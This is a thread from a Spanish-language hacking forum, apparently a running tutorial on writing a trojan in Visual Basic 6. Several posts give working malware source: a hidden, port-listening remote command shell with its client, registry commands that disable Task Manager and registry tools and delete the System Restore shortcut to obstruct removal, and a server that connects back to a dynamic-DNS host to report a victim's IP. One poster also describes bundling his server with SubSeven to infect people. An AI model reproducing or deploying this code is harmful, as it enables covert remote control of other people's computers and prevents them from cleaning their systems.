Tema destacado: Nueva página de elhacker.net en Google+ 
Autor
|
Tema: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual (Leído 112,435 veces)
|
-Xenon-
Spectrum 128k
|
con eso basta, pero quien ha dicho que sea mi troyano?
es solo codigo ideas conceptos, fragmentos, pero no es mi troyano en absoluto
un saludo
dp: con el visual basic 6.0 basta, tranquilo
|
|
|
|
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
yovaninu
|
HOLA: ... 4 -para dar el GUSTAZO ala gente de hacerse su propio troyano y que se puedan sentir (GENIOS, FIERAS, COJONUDOS) coño la gente que crea troyanos deben de ser la polla, y ahora YO estoy haciendo uno!!) esto es lo que pensarian ellos, yo lo pense en su momento( no es asi jejeje, pero siempre es una satisfaccion personal grande )
5 -como deber que tengo, mi moral me obliga, mi etica, yo no puedo saber cosas y callarmelas, seria egoista muy egoista, siendo que yo he aprendido asi... asi que que menos que enseñar lo que pueda....
FIN
un saludo!!!
Hola amigos de elhacker.net hasta esta pagina 13 y hasta este punto yo siempre segui el tuto de una manera silenciosa y respetuosa y por supuesto que asi lo seguire haciendo, pero aqui en esta parte me dio unas ganas tremendas de postear mi opinion respecto a la pregunta de hotmail a fulano del por que enseñar de esta manera ha hacer un troyano, y en la respuesta de fulano_ tambien me identifico por que de la misma manera muchos pensamos y estamos infinitamente agradecidos a fulano_ por esta iniciativa, y tienes razon mucha razon cuando dices que es un orgullo personal es una satisfaccion unica que incluso no se puede explicar, yo el troyano lo hize funcionar desde la primera pagina de este tuto gracias a fulano_ y nunca postee al respecto por que todo me iba bien, incluso ya lo modifique para hacer un mini messenger y chateo con amigos que estan a miles de kilometros de qui a traves de ese programa en basic que fulano_ empezo a enseñar claro que ya no es un troyano pero por haberme dado la idea de hacer un mini messenger le estoy muy agradecido, perdonen por esta opinion espero que no moleste a nadie y si desean toda la codificacion de esa especie de mini messenger que hize gustoso la subiria a ete hilo, muchas gracias y perdonad mi atrevimiento....
|
|
|
|
|
|
|
|
|
Ertai
Ex-Staff
Ralph Wiggum
|
Hola amigos de elhacker.net hasta esta pagina 13 y hasta este punto yo siempre segui el tuto de una manera silenciosa y respetuosa y por supuesto que asi lo seguire haciendo, pero aqui en esta parte me dio unas ganas tremendas de postear mi opinion respecto a la pregunta de hotmail a fulano del por que enseñar de esta manera ha hacer un troyano, y en la respuesta de fulano_ tambien me identifico por que de la misma manera muchos pensamos y estamos infinitamente agradecidos a fulano_ por esta iniciativa, y tienes razon mucha razon cuando dices que es un orgullo personal es una satisfaccion unica que incluso no se puede explicar, yo el troyano lo hize funcionar desde la primera pagina de este tuto gracias a fulano_ y nunca postee al respecto por que todo me iba bien, incluso ya lo modifique para hacer un mini messenger y chateo con amigos que estan a miles de kilometros de qui a traves de ese programa en basic que fulano_ empezo a enseñar claro que ya no es un troyano pero por haberme dado la idea de hacer un mini messenger le estoy muy agradecido, perdonen por esta opinion espero que no moleste a nadie y si desean toda la codificacion de esa especie de mini messenger que hize gustoso la subiria a ete hilo, muchas gracias y perdonad mi atrevimiento....
 Me alegra oir esto..  Saludos.
|
|
|
|
|
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) { /* Quien dijo que no se podia sin una variable temporal? */ *a = *a ^ *b; *b = *a ^ *b; *a = *a ^ *b; }
|
|
|
-Xenon-
Spectrum 128k
|
Gracias  , perdonad mi atrevimiento.... no hay na que perdonar  , me alegra mucho que te haya ayudado a ti, y a mas gente, es una satisfacción! he estado muy ausente.. problemas con la novia y esas cosas...aver si pronto, pongo algo nuevo un saludo!!
|
|
|
|
« Última modificación: 19 Junio 2005, 22:53 por fulano_ »
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
|
Rey11
|
Voy a contribuir un poco en este magnifico tutorial que cada vez se hace mas grande y esta genial. Bueno lo que voy a enseñar es a hacer shell's remotas, algo estilo netcat. Ej: Hacer un dir en un sistema y que recibamos respuesta Servidor:En un módulo ponemos las llamadas a la api: Este código no es mio el del módulo las llamadas a las apis creo que es de un tal Distroier de el foro de hackxcrack. Puesto que el código es publico lo pongo aqui pero siempre teniendo en cuenta su dueño.  Public Declare Function CreatePipe Lib "kernel32" ( _ phReadPipe As Long, _ phWritePipe As Long, _ lpPipeAttributes As Any, _ ByVal nSize As Long) As Long 'Leer Tunel Public Declare Function ReadFile Lib "kernel32" ( _ ByVal hFile As Long, _ ByVal lpBuffer As String, _ ByVal nNumberOfBytesToRead As Long, _ lpNumberOfBytesRead As Long, _ ByVal lpOverlapped As Any) As Long 'Esto lo usa la funcion CreateProcessA Public Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type 'Esto lo usa la funcion CreateProcessA Public Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type 'Esto lo usa la funcion CreateProcessA Public Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type 'Esta funcion lanza el proceso y 'devuelve sus datos a traves de PROCESS_INFORMATION Public Declare Function CreateProcessA Lib "kernel32" ( _ ByVal lpApplicationName As Long, _ ByVal lpCommandLine As String, _ lpProcessAttributes As SECURITY_ATTRIBUTES, _ lpThreadAttributes As SECURITY_ATTRIBUTES, _ ByVal bInheritHandles As Long, _ ByVal dwCreationFlags As Long, _ ByVal lpEnvironment As Long, _ ByVal lpCurrentDirectory As Long, _ lpStartupInfo As STARTUPINFO, _ lpProcessInformation As PROCESS_INFORMATION) As Long 'Cierra el tunel Public Declare Function CloseHandle Lib "kernel32" ( _ ByVal hHandle As Long) As Long 'Constantes necesarias para lo de antes Public Const NORMAL_PRIORITY_CLASS = &H20& Public Const STARTF_USESTDHANDLES = &H100& Public Const STARTF_USESHOWWINDOW = &H1
Public Function CMD(ByVal Comando As String) As String On Error GoTo ACAGAR Dim proc As PROCESS_INFORMATION 'Informacion de CreateProcessA Dim Ret As Long 'Esto se usa para obtener el retorno de las 'funciones API Dim start As STARTUPINFO 'Informacion de inicio para CreateProcessA Dim sa As SECURITY_ATTRIBUTES 'Atributos de seguridad para 'CreateProcessA Dim hReadPipe As Long 'Lectura de Tunel Dim hWritePipe As Long 'Escritura de Tunel Dim lngBytesread As Long 'Cantidad de Bytes leidos Dim strBuff As String * 256 'Buffer de lectura de tunel 'Creamos el tunel... sa.nLength = Len(sa) sa.bInheritHandle = 1& sa.lpSecurityDescriptor = 0& Ret = CreatePipe(hReadPipe, hWritePipe, sa, 0) If Ret = 0 Then 'Si falla la creacion del tunel CMD = "Fallo de Conexion con Proceso. Error: " & Err.LastDllError Exit Function End If 'Lanzamos el interprete de comandos... start.cb = Len(start) start.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW start.hStdOutput = hWritePipe start.hStdError = hWritePipe 'Buscar la ruta del CMD.exe y añadir /c y el comando mCommand = Environ("COMSPEC") + " /c " + Comando 'Creamos el proceso usando la String mCommand de antes... 'y obtenemos RET para saber si se ha ejecutado Ret& = CreateProcessA(0&, mCommand, sa, sa, 1&, _ NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc) If Ret <> 1 Then 'si no se encuentra el comando... CMD = "Archivo o Comando no encontrado" Exit Function End If 'Cerramos el tunel Ret = CloseHandle(hWritePipe) mOutputs = "" 'lo leemos Do Ret = ReadFile(hReadPipe, strBuff, 256, lngBytesread, 0&) mOutputs = mOutputs & Left(strBuff, lngBytesread) Loop While Ret <> 0 'cerramos los Handles (controladores) Ret = CloseHandle(proc.hProcess) Ret = CloseHandle(proc.hThread) Ret = CloseHandle(hReadPipe) 'y hacemos que la funcion devuelva el resultado del comando a traves ' de la string mOutputs CMD = mOutputs Exit Function ACAGAR: CMD = "Error:" + Err.Description End Function Y luego en el formulario ponemos lo de los comandos: Private Sub Form_Load() On Error Resume Next Form1.Visible = False 'ocultamos el formulario Winsock1.LocalPort = "6666" 'ponemos 6666 en localport Winsock1.Listen 'ponemos winsock a la escucha end sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) Winsock1.Close 'Cerramos y aceptamos Winsock1.Accept requestID End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim resultado As String Dim dato As String Winsock1.GetData dato 'Lo que nos mandan lo guardamos en la bariable dato resultado = CMD(dato) 'Hacemos la shell Winsock1.SendData resultado 'Enviamos el resultado End Sub Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) Winsock1.Close 'Si ocurre un error se abre y se cierra Winsock1.Listen End Sub Con esto ya recibiría datos, ahora vamos con el cliente: Cliente:El código no lo voy a comentar mucho ni voy a poner lo que hay que añadir, creo que se entiende Private Sub Command1_Click() On Error Resume Next Winsock1.Connect Text1, 6666 End Sub Private Sub Command2_Click() Winsock1.Close End Sub Private Sub Command3_Click() On Error Resume Next Winsock1.SendData Text2 & vbCrLf End Sub
Private Sub Command4_Click() Call MsgBox("Este es un cliente, puedes usar los comandos tipicos del ms-dos, dir, mkdir, etc.. pero si quieres ver el contenido de otro directorio que no sea c:\ tienes que hacer dir c:\nobredirectorio o dir cd c:\nombredirectorio", vbExclamation, "Información") End Sub Private Sub Command5_Click() Call MsgBox("Minitroyano creado para vbtrollano por reydelmundo11", vbExclamation, "creditos") End Sub Private Sub Winsock1_Connect() Call MsgBox("Conectados con exito", vbOKOnly, "Bien") Command1.Enabled = False Command2.Enabled = True Command3.Enabled = True End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim datos As String Winsock1.GetData datos Text3 = Text3 & datos End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) Call MsgBox("Error al conectar") Command1.Enabled = True Command2.Enabled = False Command3.Enabled = False End Sub Espero que hos sea util para crear shell remotas aunque hay problemas al usar el comando cd para cambiar de directorio siempres puedes hacer dir c:\carpeta\subcarpeta. Un saludo y con mis mejores deseos espero que este tutorial siga creciendo
|
|
|
|
« Última modificación: 28 Junio 2005, 15:18 por reydelmundo11 »
|
|
|
|
|
txomin
|
para dificultar la desinfecion del troyano se podria añadir:::
Kill "C:\Documents and Settings\All Users\Menú Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar sistema.lnk" Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
|
|
|
|
|
|
|
|
|
ジ
en la cuna !!
|
Siento decir que lo que ha posteado reydelmundo no funciona correctamente , el comando cd.. , cd , dir y como dice el para cambiar de carpetas no funciona bien , eso hay que corregirlo y creo que deberias sitar las fuentes del codigo reydelmundo11 , esa funcion , la del modulo es de un usuario del foro de hackxcrack , Distroier creo que se llama , te lo digo para que la gente no se piense que tú te has currado la funcion esa  lo demas si que es codigo tullo pero la funcion me parece que deberias aver sitado la fuente y autor . Y tambien pues colocar el link a la web donde lo viste , un salu2.
|
|
|
|
|
|
el tiempo pondrá a cada uno en su lugar 
|
|
|
|
Rey11
|
Ya lo he modificado poniendo de quien es, lo tenía por mi disco duro y creia que no era de nadie. Perdón por el fallo.
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
pues esas cosas dicen mucho de la persona, agenciarse tutos, y publicarlos como suyos.... no esta nada bien ayyyysssssss 
|
|
|
|
|
|
|
|
|
^DeMoN^
A la Droga Dile NO...Me dejes nunca.
|
La Verdad Ta weno el Tuto...Lastima no entiendo de VB Osea no no entiendo xD pero lo leo una y otra vez al tuto y nada xD Osea no se xD Lo leo y leo y no me keda, como que me trabo xD Sera la Marihuana? :s No creo pero osea Voy a Seguir Tratando xD Eso que e leido ese tuto Facil 4 veces Pero nome keda es como un Chino Basico xD jajaja Weno me Retiro Seguire Provando  Suerte y Adios 
|
|
|
|
|
|
Ustedes controlan nuestras vidas, nosotros sus sistemas. Server: irc.feg2.com 6667 Canal:#Malware
|
|
|
-Xenon-
Spectrum 128k
|
 no te preocupes, es normal que te suene a chino, si nunca as tocado la programacion, haz una cosa: busca en google: TUTORIAL VB BASICO te bajas un tutorial basico y te lo miras, con que le dediques unas 3 horas, luego entenderas mi tutorial, que ala par tambien esplico las lineas de codigo, para que sepas que hace cada cosa, pero claro necesitas leer un tuto basico!
|
|
|
|
|
|
|
|
|
|
Rey11
|
Estoy contigo fulano_ no se puede pretender entender tu tutorial si no se tiene mínimos conocimientos en visual basic y esos conocimientos los coges con el tiempo. No en tres horas 
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
yo los cogi en 3 horas, y si yo pude, el tambien!
|
|
|
|
|
|
|
|
|
|
NoyZe
|
Wenas a toos!!!!! Mi nombre es Alejandro Sanz y tengo 13 años. Kon 12 empecé a programar con QBasic(eske tenia una ***** de ordena y no fuckaba otra cosa! XD). Mas tarde descubrí Visual Basic pero no tengo ningun compañero cerca pa preguntar que entienda. Kedría felicitar a todos los colaboradores xke me parece increible lo que se puede hacer kon VB. He stao haciendo algunas paridas de programas, pero por pienso que lo que hago es algo util. Bueno, no stoy haciendo el troyano en sí si no que ha adjuntado el servidor simple(el que komunica la ip por una label) al server del subseven y la peña se lo traga! XD (asta que doy con el antivirus!) pero a medida que voy leyendo el hilo voy aprendiendo kantidad de kosas!
Al final supongo que algo me kedará, ademas, lo quiero hacer pero hay tanta informacion aki k no puedo hacerlo too seguido. Me colapso! XDDDD Al ser un troyano indetectable me encantaría terminarlo!
Weno, aki termino el post, enga pues! Y muxos agradecimientos a todos!!!!!
HACK THE WORLD
|
|
|
|
|
|
 My WeB Debes matar en la primera frase, chico. Recuerda estas palabras siempre que ágarres un Micro: -Aaaaasí lo haré señor, quiero ser master de MC. Describe la ignorancia con mi máteria gris!
|
|
|
|
NoyZe
|
Tengo un problemilla kon el kodigo, si alguien me pudiera decir lo que le pasa... Por ahora solo e exo lo de recibir la ip y (aki es donde da la error) intentar conversar kon el host, pero no puedo, me da un error y se cierra el programa... :'( os dejo el codigo, oks? en el cliente tengo 2 forms, onde recibo el ip y pa conversar En el form de recibir la ip tengo: 1 timer 1 Winsock 2 botones 1 textbox 2 labels 1 statusbar En el form de conversar tengo: 2 textbox 1 boton Cliente: Form1 Private Sub Command1_Click() Form2.Visible = True comand = "chat" ws.SendData comand
End Sub
Private Sub ws_ConnectionRequest(ByVal requestID As Long) 'cuando se intente conectar a este (servicio,puerto,socket,o etc..) recojera su ip y ejecutara el siguiente codigo: On Error GoTo error 'si ay un error ves ala etiketa (error) ws.Close 'necesario para aceptar la conexion ws.Accept requestID 'acepta cualquier conexion entrante Label3.Caption = ws.RemoteHostIP 'añades otra etiketa y esto hara que te ponga la ip remota del servidor 'esto ejecuta un archivo, yo lo puse para que ejecutase un sonido y asi coscarme de cuando se me conecta la victima, osea el servidor Timer1.Interval = 3000 '3 segunditosss, sobra decir que tienes que añadirlo asi que ahora sere mas concreto por que ya presupongo que as aprendido algo de vb de la revista, o con solo averlo visto por encima y jugueteado un poco con el , entenderas todo lo que digo, y sino ya pregunhtareis error: End Sub
Private Sub escuchar_Click() On Error Resume Next 'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo ws.LocalPort = Text1.Text 'el puerto que empleara el winsock sera el que introduzcas en un textbox, AÑADELO ws.Close 'ws llama al objeto winsock que hemos agregado el punto te deja elegir opciones, y la opcion close es para que cierre la conexiono el puerto abierto ws.Listen 'deja ala escucha el puerto introducido en el textbox If ws.State = 2 Then estado.SimpleText = "Escuchando" 'si el estado del winsock es (escuchando) entonces la propiedad caption de la etiketa sera "Escuchando" asi que ya estas añadiendo un label(etiketa), esto es util para ver si de verdad esta escuchando o no, ya que si ese puerto ya estubiera abierto no te dejaria abrirlo para este programa, de ay tambien lo de ws.close antes... End Sub
Private Sub Timer1_Timer() 'al pasar 3 segundos de establecerse la conexion On Error GoTo error If Not ws.State = 7 Then 'si el estado de la conexion no es (conectado) entonces que me ponga en una etekita "Desconectado" estado.SimpleText = "Desconectado" Else End If If ws.State = 7 Then estado.SimpleText = "Conectado" Else End If If estado.SimpleText = "Desconectado" Then 'si pone desconectado en el label, entonces ejecuta lo de la etiketa puente,"cerrar y volver a escuchar" estado.SimpleText = "Desconectado" GoTo puente Else End If GoTo error 'puentea y se salta el cierre y vuelta a escuchar la conexion, para que seguir normalmente con la conexion establecida puente: ws.Close ws.Listen error: End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long) ws.GetData hostonto If hostonto(Left, 1) = "/" Then Form2.Text1.Text = Form2.Text1.Text & hostonto End If End Sub
Form2: Private Sub send_Click() hackealo = Text2.Text ws.SendData hackealo End Sub
Server: En el server tb tengo 2 forms, en el primero tengo: 1 timer 1 winsock Yen el segundo: 2 textbox 1 boton 1 label
Codigo de form2:(el de conversar) Private Sub send_Click() On Error Resume Next kagao = textlocal.Text Left(kagao, 1) = "/" ws.SendData kagao Text1.Text = Text1.Text & kagao End Sub
Codigo de form1:
Private Sub Form_Load() On Error GoTo kagada: puertolocal = 1991 ws.LocalPort = puertolocal ws.RemotePort = 1991 iphost = "hackthenation.myftp.org" ws.RemoteHost = iphost miip = ws.LocalIP ws.Connect Timer1.Interval = 3000 kagada: End Sub
Private Sub Timer1_Timer() On Error Resume Next ws.SendData miip End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long) ws.GetData comando If comando = "chat" Then hackchat.Visible = True End If If Left(comando, 1) = "/" Then hackchat.Visible = True hackchat.Text1.Text = hackchat.Text1.Text & comando End If End Sub
Si me pudieseis ayudar os lo agradeceria! 
|
|
|
|
|
|
 My WeB Debes matar en la primera frase, chico. Recuerda estas palabras siempre que ágarres un Micro: -Aaaaasí lo haré señor, quiero ser master de MC. Describe la ignorancia con mi máteria gris!
|
|
|
|
|